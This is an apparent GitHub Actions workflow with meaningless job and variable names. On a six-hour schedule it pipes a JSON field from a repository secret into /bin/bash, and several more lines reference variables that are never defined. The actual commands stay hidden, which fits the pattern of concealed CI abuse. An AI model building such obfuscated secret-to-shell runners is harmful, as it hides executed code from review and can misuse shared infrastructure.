name: zhuqingliu2345
on:
  workflow_dispatch:
  schedule:
    - cron: '46 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhuqingliu2345
        env:
          vhmaz011: ${{ secrets.vhmaz011 }}
        run: |
          echo $vhmaz011 | jq -r .oqz2 | /bin/bash
          echo $hvn5 | jq -r .j952 | /bin/bash
          echo $qcjs774 | jq -r .sz54 | /bin/bash
          echo $zf7823 | jq -r .gklob1 | /bin/bash
          echo $bmcgr7888 | jq -r .kjjkb30451 | /bin/bash

